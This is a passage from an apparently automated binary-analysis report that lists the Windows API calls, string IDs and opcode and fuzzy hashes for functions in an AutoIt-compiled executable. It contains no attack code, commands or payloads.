              • Opcode Fuzzy Hash: c1b7368c736839eaabeb92469f130d4b519100d62addbaf9cd4a0ac1d4f944bb
              • Instruction Fuzzy Hash: 18715971A00219DFCB14DF54D485A9EBBF1BF08310F0485AEE816AB392DB74ED45CB95
              APIs
              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00737206
              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0073723C
              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0073724D
              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007372CF
              Similarity
              • API ID: ErrorMode$AddressCreateInstanceProc
              • String ID: DllGetClassObject
              • API String ID: 753597075-1075368562
              • Opcode ID: 8fae348152053146573f0432cfc1cf529a9a94566f8e5d63617a85e3d866545e
              • Instruction ID: c411d1eb9db18e9f20f84f30a2d6589b7704a4370115330de7fa7a5e61e04184
              • Opcode Fuzzy Hash: 8fae348152053146573f0432cfc1cf529a9a94566f8e5d63617a85e3d866545e
              • Instruction Fuzzy Hash: E5411DF2604205DFEB29CF54C884A9B7BB9FF49310F1580A9BD059F20AD7B9D944DBA0
              APIs
              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00762F8D
              • LoadLibraryW.KERNEL32(?), ref: 00762F94
              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00762FA9
              • DestroyWindow.USER32(?), ref: 00762FB1
              Similarity
              • API ID: MessageSend$DestroyLibraryLoadWindow
              • String ID: SysAnimate32
              • API String ID: 3529120543-1011021900
              • Opcode ID: 0eebaf71a50527c5f26ccc9d03f3d60966a4ab20ceea4e55203df512bd9c4897
              • Instruction ID: adec3db30a13d66e342eb2a37a270546e534539d3a460560a75e3227ef2b74ea
              • Opcode Fuzzy Hash: 0eebaf71a50527c5f26ccc9d03f3d60966a4ab20ceea4e55203df512bd9c4897
              • Instruction Fuzzy Hash: 7621DE71204605ABEB514FA4DC80EFB37B9EF59364F108618FE52D61A1C7B9DC429B60
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006F4D1E,007028E9,?,006F4CBE,007028E9,007988B8,0000000C,006F4E15,007028E9,00000002), ref: 006F4D8D
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F4DA0
              • FreeLibrary.KERNEL32(00000000,?,?,?,006F4D1E,007028E9,?,006F4CBE,007028E9,007988B8,0000000C,006F4E15,007028E9,00000002,00000000), ref: 006F4DC3
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: a049f690f4cbf51a17be44465992fd00fb22dc04e0f73f63edc27ef81d521838
              • Instruction ID: 258562cd605416a438d072dd977abc58dd594bffcc21d92d8f0b54901819460e
              • Opcode Fuzzy Hash: a049f690f4cbf51a17be44465992fd00fb22dc04e0f73f63edc27ef81d521838
              • Instruction Fuzzy Hash: 71F0813050020CABDB159B94DC09BFEBBA5EF44751F004095E90AA2650DB745D40CAD4
              APIs
              • LoadLibraryA.KERNEL32 ref: 0072D3AD
              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0072D3BF
              • FreeLibrary.KERNEL32(00000000), ref: 0072D3E5
              Similarity
              • API ID: Library$AddressFreeLoadProc
              • String ID: GetSystemWow64DirectoryW$X64
              • API String ID: 145871493-2590602151
              • Opcode ID: 82e93b54213b02991a579f62d4f93873eb9722f67e68129a711be70db5532b82
              • Instruction ID: f08101681890dacfcaccd71e2aff04959e5da7f0330e2420a7c3307487db59af
              • Opcode Fuzzy Hash: 82e93b54213b02991a579f62d4f93873eb9722f67e68129a711be70db5532b82
              • Instruction Fuzzy Hash: A1F055B0802730CBE736AB11EC189BD7351BF02701F68C196F843E1002DB6CCE408687
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006D4EDD,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E9C
              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006D4EAE
              • FreeLibrary.KERNEL32(00000000,?,?,006D4EDD,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4EC0
              Similarity
              • API ID: Library$AddressFreeLoadProc
              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
              • API String ID: 145871493-3689287502
              • Opcode ID: 9d5ce33633201b8f879a8db36e3ca157817e20daa987039bf88cb54275b40043
              • Instruction ID: 0f5f9f2ec540540f642a2e679f1964a5c1bae3f48832e1a6788cdcc52f817ce8
              • Opcode Fuzzy Hash: 9d5ce33633201b8f879a8db36e3ca157817e20daa987039bf88cb54275b40043
              • Instruction Fuzzy Hash: 18E0CD75E017226BD23317257C18BBF7755AF82F627094116FC46D2300DFB8CD0140A4
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00713CDE,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E62
              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006D4E74
              • FreeLibrary.KERNEL32(00000000,?,?,00713CDE,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E87
              Similarity
              • API ID: Library$AddressFreeLoadProc
              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
              • API String ID: 145871493-1355242751
              • Opcode ID: 659d644e2e34fd384737fe50803d7a64dc8530789483f8d4ce3e1997e85353df
              • Instruction ID: 1e287c962f316968d2365e3f51110a7c30c07a87d38941802b722ec1666283b7
              • Opcode Fuzzy Hash: 659d644e2e34fd384737fe50803d7a64dc8530789483f8d4ce3e1997e85353df
              • Instruction Fuzzy Hash: 92D0C271902761674A231B24BC08DEB3B1AAFC6B513054212F846A2310CFB8CD0181D4
              APIs
              • GetCurrentProcessId.KERNEL32 ref: 0075A427
              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0075A435
              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0075A468
              • CloseHandle.KERNEL32(?), ref: 0075A63D
              Similarity
              • API ID: Process$CloseCountersCurrentHandleOpen
              • String ID:
              • API String ID: 3488606520-0
              • Opcode ID: 49fb00e88d3e66cb24ea3d85d9bedd10df30d1bc6a6037cd988eb96f26e84563
              • Instruction ID: 5b76c2fdd5220a04bbe4d7147e2f0f6785f7009a9cc21663cc82b71276b17e58
              • Opcode Fuzzy Hash: 49fb00e88d3e66cb24ea3d85d9bedd10df30d1bc6a6037cd988eb96f26e84563
              • Instruction Fuzzy Hash: C8A1B071604301AFD760DF24C882F6AB7E6AF84714F14891DF99A9B392D7B4EC44CB86
              APIs
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00773700), ref: 0070BB91
              • WideCharToMultiByte.KERNEL32(00000000,00000000,007A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0070BC09
              • WideCharToMultiByte.KERNEL32(00000000,00000000,007A1270,000000FF,?,0000003F,00000000,?), ref: 0070BC36
              • _free.LIBCMT ref: 0070BB7F
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 0070BD4B
              Similarity
              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
              • String ID:
              • API String ID: 1286116820-0
              • Opcode ID: 7c7d7ddf5236eaf70b0799f9a9f70dbe2c4ac6f29027a869e3926a9fad197ab8
              • Instruction ID: 872fe7b4f56e26affa0f48dd98180a6c4461752e70c652df0ef9cc4b7f8ad31a
              • Opcode Fuzzy Hash: 7c7d7ddf5236eaf70b0799f9a9f70dbe2c4ac6f29027a869e3926a9fad197ab8
              • Instruction Fuzzy Hash: 79510571900209EFEB10EF659C85AAAB7F8FF81350F50436AE450D72E1EB789F418B64
              APIs
                • Part of subcall function 0073DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0073CF22,?), ref: 0073DDFD
                • Part of subcall function 0073DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0073CF22,?), ref: 0073DE16
                • Part of subcall function 0073E199: GetFileAttributesW.KERNEL32(?,0073CF95), ref: 0073E19A
              • lstrcmpiW.KERNEL32(?,?), ref: 0073E473
              • MoveFileW.KERNEL32(?,?), ref: 0073E4AC
              • _wcslen.LIBCMT ref: 0073E5EB
              • _wcslen.LIBCMT ref: 0073E603
              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0073E650
              Similarity
              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
              • String ID:
              • API String ID: 3183298772-0
              • Opcode ID: 2d7df6fed0f53378a84d9ff7156ea17c4e90b5152516c5bc573669ba4461a812
              • Instruction ID: 02cbf1f3057567ad04ac310bbafe162ade73db8a0de28b8cde86948f88b225c5
              • Opcode Fuzzy Hash: 2d7df6fed0f53378a84d9ff7156ea17c4e90b5152516c5bc573669ba4461a812
              • Instruction Fuzzy Hash: 655185B25083859BD764DB90DC819DF77ED9F84340F00491EF6C9D3192EF78A588876A
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
                • Part of subcall function 0075C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075B6AE,?,?), ref: 0075C9B5
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075C9F1
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA68
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA9E
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075BAA5
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075BB00
              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0075BB63
              • RegCloseKey.ADVAPI32(?,?), ref: 0075BBA6
              • RegCloseKey.ADVAPI32(00000000), ref: 0075BBB3
              Similarity
              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
              • String ID:
              • API String ID: 826366716-0
              • Opcode ID: 6d018a37206ca4c63a0d61ce5841cd133cadbff730644fd2756a29846960f23b
              • Instruction ID: 600d2c260b09e32b27a6b7555b8650f2cceb2eacb3074690977f666e6f2dee4a
              • Opcode Fuzzy Hash: 6d018a37206ca4c63a0d61ce5841cd133cadbff730644fd2756a29846960f23b
              • Instruction Fuzzy Hash: E861C271208241AFD314DF14C890E7ABBE5FF84308F14855DF8994B2A2DB75ED49CB92
              APIs
              • VariantInit.OLEAUT32(?), ref: 00738BCD
              • VariantClear.OLEAUT32 ref: 00738C3E
              • VariantClear.OLEAUT32 ref: 00738C9D
              • VariantClear.OLEAUT32(?), ref: 00738D10
              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00738D3B
              Similarity
              • API ID: Variant$Clear$ChangeInitType
              • String ID:
              • API String ID: 4136290138-0
              • Opcode ID: 25e429a72c5b7b9c90e7bd36870cba5aaca216c79db604f05e0c12ef6b1927c7
              • Instruction ID: be83457bb7a87ba22a21e248b5ec7bf40c83c5ef64bd65d69e4e20c4e7dab463
              • Opcode Fuzzy Hash: 25e429a72c5b7b9c90e7bd36870cba5aaca216c79db604f05e0c12ef6b1927c7
              • Instruction Fuzzy Hash: 4A5148B5A00219AFDB10CF68C884AAABBF4FF8D310F158559F915DB350EB34E911CBA1
              APIs
              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00748BAE
              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00748BDA
              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00748C32
              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00748C57
              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00748C5F
              Similarity
              • API ID: PrivateProfile$SectionWrite$String
              • String ID:
              • API String ID: 2832842796-0
              • Opcode ID: b86bd8bf148b02cba9dda58cb3e97686b741125748cf77a0500ec00b0c605fcf
              • Instruction ID: 9635f52530465e3d0e3cafd6b59a35548ab925787677d3e6ba7d22bbe5ff217a
              • Opcode Fuzzy Hash: b86bd8bf148b02cba9dda58cb3e97686b741125748cf77a0500ec00b0c605fcf
              • Instruction Fuzzy Hash: 67515D35A002199FCB45DF65C880E6DBBF6FF48314F088499E849AB362DB35ED41CBA5
              APIs
              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00758F40
              • GetProcAddress.KERNEL32(00000000,?), ref: 00758FD0
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00758FEC
              • GetProcAddress.KERNEL32(00000000,?), ref: 00759032
              • FreeLibrary.KERNEL32(00000000), ref: 00759052
                • Part of subcall function 006EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00741043,?,7644E610), ref: 006EF6E6
                • Part of subcall function 006EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0072FA64,00000000,00000000,?,?,00741043,?,7644E610,?,0072FA64), ref: 006EF70D
              Similarity
              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
              • String ID:
              • API String ID: 666041331-0
              • Opcode ID: 57a9ecce90e01b5e1216616bdd9693d8e421d65a591892b48d37a04d96ba8fe1
              • Instruction ID: a8a04b439705a8663272b93bcaafbaf0d1b033a4d8add5ab4e450daeb78476a7
              • Opcode Fuzzy Hash: 57a9ecce90e01b5e1216616bdd9693d8e421d65a591892b48d37a04d96ba8fe1
              • Instruction Fuzzy Hash: CA514A35A00205DFC745DF54C4948ADBBB1FF49315F088099ED0AAB3A2DB75ED89CB91
              APIs
              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00766C33
              • SetWindowLongW.USER32(?,000000EC,?), ref: 00766C4A
              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00766C73
              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0074AB79,00000000,00000000), ref: 00766C98
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00766CC7
              Similarity
              • API ID: Window$Long$MessageSendShow
              • String ID:
              • API String ID: 3688381893-0
              • Opcode ID: 2ae6c83b692c4fab29c30d2e5702685eb0ebae28efb1b318aec5671e1f4f9a1c
              • Instruction ID: 8e2a43304c3b4aca464fda7e4930e3718abd7d3debbe045aa26bf52c66b0b581
              • Opcode Fuzzy Hash: 2ae6c83b692c4fab29c30d2e5702685eb0ebae28efb1b318aec5671e1f4f9a1c
              • Instruction Fuzzy Hash: E141E235600504AFD725CF28CC48FA57BA5EB09350F954268EC9AA72A0C379BD40CA64
              APIs
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: 6c0e1822d327b044fbdbf4d48a394b482efa80c14e2a0fb46491e7511a580de6
              • Instruction ID: 717a3d38f3b0a76fd539a1934feb05e6fd1f8bc575b02f3d5dfe20c238920c3e
              • Opcode Fuzzy Hash: 6c0e1822d327b044fbdbf4d48a394b482efa80c14e2a0fb46491e7511a580de6
              • Instruction Fuzzy Hash: F5419333A00304DFCB24DF78C885A59B7E5EF89314F1546A9E615EB392DA35AD02CB91
              APIs
              • GetCursorPos.USER32(?), ref: 006E9141
              • ScreenToClient.USER32(00000000,?), ref: 006E915E
              • GetAsyncKeyState.USER32(00000001), ref: 006E9183
              • GetAsyncKeyState.USER32(00000002), ref: 006E919D
              Similarity
              • API ID: AsyncState$ClientCursorScreen
              • String ID:
              • API String ID: 4210589936-0
              • Opcode ID: 0eda5e36a253d7be3392cee5c6fe967064d7198722622a1ddbd248f0828bfc85
              • Instruction ID: 97797849ca386c7e494e2613036b4a0810a48c0de4450d8f71e1b2f226d17847
              • Opcode Fuzzy Hash: 0eda5e36a253d7be3392cee5c6fe967064d7198722622a1ddbd248f0828bfc85
              • Instruction Fuzzy Hash: A7416E3190861AFBDF199F65D848BEEB775FF45320F208219E429A6290C7345D50CB61
              APIs
              • GetInputState.USER32 ref: 007438CB
              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00743922
              • TranslateMessage.USER32(?), ref: 0074394B
              • DispatchMessageW.USER32(?), ref: 00743955
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00743966
              Similarity
              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
              • String ID:
              • API String ID: 2256411358-0
              • Opcode ID: 0005dff570550ebaee44bd682dfb8308285f8a00ad567535cd06bb89597ac496
              • Instruction ID: b0e53533a439444c0e536f4926ee93769234d1a33d9765992d95d730e36d990f
              • Opcode Fuzzy Hash: 0005dff570550ebaee44bd682dfb8308285f8a00ad567535cd06bb89597ac496
              • Instruction Fuzzy Hash: AF31D9709043419EFB35CB349C48BB777A8AB46308F54856DD4AAC20A0E3FCB685CB25
              APIs
              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0074CF38
              • InternetReadFile.WININET(?,00000000,?,?), ref: 0074CF6F
              • GetLastError.KERNEL32(?,00000000,?,?,?,0074C21E,00000000), ref: 0074CFB4
              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0074C21E,00000000), ref: 0074CFC8
              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0074C21E,00000000), ref: 0074CFF2
              Similarity
              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
              • String ID:
              • API String ID: 3191363074-0
              • Opcode ID: 4be5ec16aa9b428c940686044d9e3de1e5e7287b0cbed6263942fa90b92832ec
              • Instruction ID: 27fa84bd04711c806bc02e1d4ad49df109c0b73f08f2853845a498e5b947c5cb
              • Opcode Fuzzy Hash: 4be5ec16aa9b428c940686044d9e3de1e5e7287b0cbed6263942fa90b92832ec
              • Instruction Fuzzy Hash: 51317C72601305EFDB61DFA5C884AABBBF9EF14310B10842EF546D2101EB78AE459B60
              APIs
              • GetWindowRect.USER32(?,?), ref: 00731915
              • PostMessageW.USER32(00000001,00000201,00000001), ref: 007319C1
              • Sleep.KERNEL32(00000000,?,?,?), ref: 007319C9
              • PostMessageW.USER32(00000001,00000202,00000000), ref: 007319DA
              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 007319E2
              Similarity
              • API ID: MessagePostSleep$RectWindow
              • String ID:
              • API String ID: 3382505437-0
              • Opcode ID: cceb56a4551262e3719a040504c5f4dc050b1b1d3e4e0923e453078d42f7cb51
              • Instruction ID: a5c205be8fb9ab9880f33f60ce73bd598c9f5e64d999ffce5ecbab432bc6bfd2
              • Opcode Fuzzy Hash: cceb56a4551262e3719a040504c5f4dc050b1b1d3e4e0923e453078d42f7cb51
              • Instruction Fuzzy Hash: 9631F471900259EFDB04CFA8CD99BEE3BB5EB04315F008225F962A72D1C7B4AD54CB90
              APIs
              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00765745
              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0076579D
              • _wcslen.LIBCMT ref: 007657AF
              • _wcslen.LIBCMT ref: 007657BA
              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00765816
              Similarity
              • API ID: MessageSend$_wcslen
              • String ID:
              • API String ID: 763830540-0
              • Opcode ID: c56fccd2390b1608f7fd3c59cf3d08263af5de9dd5debd94e180cbc6ee1856e3
              • Instruction ID: e8bb39a81be21ff17bb14079e961dfb9db618231dd52df418a628665d0e57ac0
              • Opcode Fuzzy Hash: c56fccd2390b1608f7fd3c59cf3d08263af5de9dd5debd94e180cbc6ee1856e3
              • Instruction Fuzzy Hash: CF21B671904618DADB218F60CC84EEE7BB8FF04724F108256FD2AEB180DB789985DF54
              APIs
              • IsWindow.USER32(00000000), ref: 00750951
              • GetForegroundWindow.USER32 ref: 00750968
              • GetDC.USER32(00000000), ref: 007509A4
              • GetPixel.GDI32(00000000,?,00000003), ref: 007509B0
              • ReleaseDC.USER32(00000000,00000003), ref: 007509E8
              Similarity
              • API ID: Window$ForegroundPixelRelease
              • String ID:
              • API String ID: 4156661090-0
              • Opcode ID: 70265cd338f37e37eddcc7679fc4e11f12472575aa2801272c9e6592f91a0fa0
              • Instruction ID: 2fb4971eca20e1512e629438959a9b3dce577d6958720b4a98b43d46169058c9
              • Opcode Fuzzy Hash: 70265cd338f37e37eddcc7679fc4e11f12472575aa2801272c9e6592f91a0fa0
              • Instruction Fuzzy Hash: D1216F39A00214AFD704EF69D888AAEBBE5EF44701F04806DE84A97352DBB4AC44CB94
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 0070CDC6
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0070CDE9
                • Part of subcall function 00703820: RtlAllocateHeap.NTDLL(00000000,?,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6,?,006D1129), ref: 00703852
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0070CE0F
              • _free.LIBCMT ref: 0070CE22
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0070CE31
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: bc334f34cb0823fc2148986ec011a0f0ab30fc053e480e935293b7c0b2a16d41
              • Instruction ID: 1d8b40084f448f41674e7b876d3f22ed77bb306853f5ff899252e2e348ffdd65
              • Opcode Fuzzy Hash: bc334f34cb0823fc2148986ec011a0f0ab30fc053e480e935293b7c0b2a16d41
              • Instruction Fuzzy Hash: 8701B1B2601215FFA32327B6EC8CC7B79ADDAC6BA1315432DFD05C6281EA688D0191B4
              APIs
              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006E9693
              • SelectObject.GDI32(?,00000000), ref: 006E96A2
              • BeginPath.GDI32(?), ref: 006E96B9
              • SelectObject.GDI32(?,00000000), ref: 006E96E2
              Similarity
              • API ID: ObjectSelect$BeginCreatePath
              • String ID:
              • API String ID: 3225163088-0
              • Opcode ID: 46c29ee6f40aae3392edb36b7141924725b29e81600343922eb0383382c791a5
              • Instruction ID: 6c299a65f9e98662d87077cd5ab1a609d993ca6e2346c04ad1c3d9eb647e117b
              • Opcode Fuzzy Hash: 46c29ee6f40aae3392edb36b7141924725b29e81600343922eb0383382c791a5
              • Instruction Fuzzy Hash: AD2183708023C5EBFB119F25EC147EA3B66BF82355F508216F411961B1D3786991CFA9
              APIs
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: 3f2e4c3d88e27bb5e2191a8f1a103aad459d26c6ac221e37f1ba69efa9c3e274
              • Instruction ID: 84c72cc5346b14f715b544cfe7a9be39fc60dda1a4d372a90a0027f9fc4f0163
              • Opcode Fuzzy Hash: 3f2e4c3d88e27bb5e2191a8f1a103aad459d26c6ac221e37f1ba69efa9c3e274
              • Instruction Fuzzy Hash: 5401B5A2645A09FBF2085520AD92FBB735E9B32394F414024FE099E242FB69ED10C2F4
              APIs
              • GetLastError.KERNEL32(?,?,?,006FF2DE,00703863,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6), ref: 00702DFD
              • _free.LIBCMT ref: 00702E32
              • _free.LIBCMT ref: 00702E59
              • SetLastError.KERNEL32(00000000,006D1129), ref: 00702E66
              • SetLastError.KERNEL32(00000000,006D1129), ref: 00702E6F
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: e4f7ef0963664a22b3dc2eb0b91ef8cd22e1c1fe56b1f2ea9e8c1035e29cb44f
              • Instruction ID: 23a8940158230e5a544c661bef658b9bda3e0af1a0b4cbfbac2a79d429bece7a
              • Opcode Fuzzy Hash: e4f7ef0963664a22b3dc2eb0b91ef8cd22e1c1fe56b1f2ea9e8c1035e29cb44f
              • Instruction Fuzzy Hash: 9B01F977285600E7C6137735AC4ED2B26DDABD17A57214725F455A22E3EA6C8C034128
              APIs
              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?,?,0073035E), ref: 0073002B
              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?), ref: 00730046
              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?), ref: 00730054
              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?), ref: 00730064
              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?), ref: 00730070
              Similarity
              • API ID: From$Prog$FreeStringTasklstrcmpi
              • String ID:
              • API String ID: 3897988419-0
              • Opcode ID: ad108b04b3712494612fabfd14a396811699769d10f30725add0bfaeb86995a9
              • Instruction ID: b84704426ecc6dbb9d9d7129f51ee4371e21350b2523666cc00bd2b7fd2cb62b
              • Opcode Fuzzy Hash: ad108b04b3712494612fabfd14a396811699769d10f30725add0bfaeb86995a9
              • Instruction Fuzzy Hash: FA01DF76600309BFEB214F68DC48BBA7AADEB44751F108024F846D7211D7B8CD009BA0
              APIs
              • QueryPerformanceCounter.KERNEL32(?), ref: 0073E997
              • QueryPerformanceFrequency.KERNEL32(?), ref: 0073E9A5
              • Sleep.KERNEL32(00000000), ref: 0073E9AD
              • QueryPerformanceCounter.KERNEL32(?), ref: 0073E9B7
              • Sleep.KERNEL32 ref: 0073E9F3
              Similarity
              • API ID: PerformanceQuery$CounterSleep$Frequency
              • String ID:
              • API String ID: 2833360925-0
              • Opcode ID: a062e0d54be5c442c9925c6900f1223f570fe923241d70a759d714fcdf92453e
              • Instruction ID: bc16ca5fbcbd681ea97c12ba5cb0701679c4cc1ded00a66a9ac2e129a9a9d960
              • Opcode Fuzzy Hash: a062e0d54be5c442c9925c6900f1223f570fe923241d70a759d714fcdf92453e
              • Instruction Fuzzy Hash: ED015B71C0162DDBDF04ABE4DC596EDBB78BB09301F004546E542B2282DB78A5518766
              APIs
              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00731114
              • GetLastError.KERNEL32(?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731120
              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 0073112F
              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731136
              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0073114D
              Similarity
              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
              • String ID:
              • API String ID: 842720411-0
              • Opcode ID: c52cb0ed7f343c6512b2faf2172b676ec72e470ff92063741e0a04a29604aee3
              • Instruction ID: 751f16a0af8128da62e7db3c9bcc28e4ff0baaa9f0ede3369ee2036e6d6e3743
              • Opcode Fuzzy Hash: c52cb0ed7f343c6512b2faf2172b676ec72e470ff92063741e0a04a29604aee3
              • Instruction Fuzzy Hash: F20181B5200309BFEB124F69DC49EAA3F6EEF85360F104414FA86C3350DB75DC008A60
              APIs
              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00730FCA
              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00730FD6
              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00730FE5
              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00730FEC
              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00731002
              Similarity
              • API ID: HeapInformationToken$AllocErrorLastProcess
              • String ID:
              • API String ID: 44706859-0
              • Opcode ID: c0d5c37e8ee2e9bfba0e9ba87dbd487c5b454c2fe7ad603b557ca32c83a549b6
              • Instruction ID: 08779c8ab0c7360a32ca40ba0f0f60029bda0de70560245c4b9f817a8ac8b736
              • Opcode Fuzzy Hash: c0d5c37e8ee2e9bfba0e9ba87dbd487c5b454c2fe7ad603b557ca32c83a549b6
              • Instruction Fuzzy Hash: 66F06275200305FBD7264FA5DC4DF663B6DEF8A761F508414F986D7251CAB9DC408A60
              APIs
              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0073102A
              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00731036
              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00731045
              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0073104C
              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00731062
              Similarity
              • API ID: HeapInformationToken$AllocErrorLastProcess
              • String ID:
              • API String ID: 44706859-0
              • Opcode ID: 0f81a31bd8689fa68dc575c3425c8eeb05d34f62aca6fce8d24d84c54243a275
              • Instruction ID: c09f3ef9309ede120a19be1d42a9c14f587dbe8ba1e0c1e8c06833329bc06974
